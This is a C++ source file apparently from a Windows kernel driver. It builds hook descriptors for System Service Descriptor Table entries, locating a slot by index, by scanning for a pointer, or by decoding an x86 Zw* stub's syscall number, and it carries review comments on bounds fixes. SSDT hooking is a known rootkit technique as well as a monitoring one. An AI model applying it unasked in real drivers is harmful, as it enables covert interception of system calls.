hookfactory.cpp

#include "HookFactory.h"
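PHook CreateHook(IN const PVOID pNewFuncPtr,IN const ULONG funcID)
{
	// Build a hook descriptor for the SSDT slot at index funcID.
	//   pNewFuncPtr : replacement routine to be installed later
	//   funcID      : index into pNtoskrnl->ServiceTable
	// Returns a newly allocated Hook (caller owns it) holding the original
	// table entry and the replacement pointer, or NULL when funcID is outside
	// the table or the allocation fails. Nothing is patched here.
	ULONG TotalCount=pNtoskrnl->ServiceLimit;
	PNTPROC ServiceTable=pNtoskrnl->ServiceTable;

	// Reject every index at or beyond the end of the table, not only the one
	// equal to it: the former `== TotalCount` test let any larger funcID read
	// past ServiceTable and record a garbage "true" pointer.
	if(funcID >= TotalCount)
		return NULL;

	PHook mNewHook = new Hook;
	// NOTE(review): assumes the driver's operator new (defined elsewhere)
	// returns NULL on failure rather than throwing -- confirm; the check is
	// harmless if it throws.
	if(mNewHook == NULL)
		return NULL;

	// Save ID of function
	mNewHook->mFuncSST_ID = funcID;
	// Save true function ptr
	mNewHook->mpTrueFuncPtr = ServiceTable[funcID];
	// Save new  function ptr
	mNewHook->mpNewFuncPtr  = pNewFuncPtr;

	return mNewHook;
}	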
PHook CreateHook(IN const PVOID pNewFuncPtr,IN const PVOID pTrueFuncPtr)
{
	// Locate the SSDT slot whose entry equals pTrueFuncPtr by linear scan and
	// hand the resulting index to the index-based overload.
	//   pNewFuncPtr  : replacement routine
	//   pTrueFuncPtr : current table entry to look up
	// Returns whatever the index-based overload returns for the first matching
	// slot, or NULL when no slot holds pTrueFuncPtr.
	ULONG limit = pNtoskrnl->ServiceLimit;
	PNTPROC table = pNtoskrnl->ServiceTable;

	// Advance until a match or the end of the table; the first hit wins.
	ULONG slot = 0;
	while(slot < limit && table[slot] != pTrueFuncPtr)
		++slot;

	// slot == limit means the scan ran off the end without finding the entry.
	if(slot >= limit)
		return NULL;

	return CreateHook(pNewFuncPtr, slot);
}
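PHook CreateHook(IN const PVOID pNewFuncPtr,IN PUNICODE_STRING function_name)
{
	/*	Resolve an exported Zw* routine by name and derive its SSDT index
		from the stub prologue.  On x86 every Zw* function exported by
		NTOSKRNL.exe starts with:

			mov eax, ULONG      ; B8 imm32 -- imm32 is the syscall index in the SSDT

		so the index is the four bytes following the 0xB8 opcode.  This decode
		is x86-specific: other architectures use a different prologue and this
		overload must not be used there without revisiting the decode.

		pNewFuncPtr   : replacement routine
		function_name : exported Zw* name passed to MmGetSystemRoutineAddress

		Returns a Hook for the decoded index (caller owns it), or NULL when the
		name does not resolve, the prologue is not the expected mov eax,imm32,
		or the decoded index lies outside ServiceTable. */

	PUCHAR stub = (PUCHAR)MmGetSystemRoutineAddress(function_name);

	if(stub == NULL)
		return NULL;

	// Check the opcode before trusting the bytes after it: a stub that has
	// been patched by something else, or a non-x86 build, would otherwise
	// yield an arbitrary index that is then used to read ServiceTable.
	if(stub[0] != 0xB8)
		return NULL;

	// imm32 sits at offset 1; the read is unaligned, which x86 tolerates.
	ULONG mFuncID = *(PULONG)(stub + 1);

	// Index 0 is a legitimate table slot; the former `mFuncID == NULL` test
	// wrongly rejected it.  Bound the index against the table instead.
	if(mFuncID >= pNtoskrnl->ServiceLimit)
		return NULL;

	return CreateHook(pNewFuncPtr,mFuncID);
}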
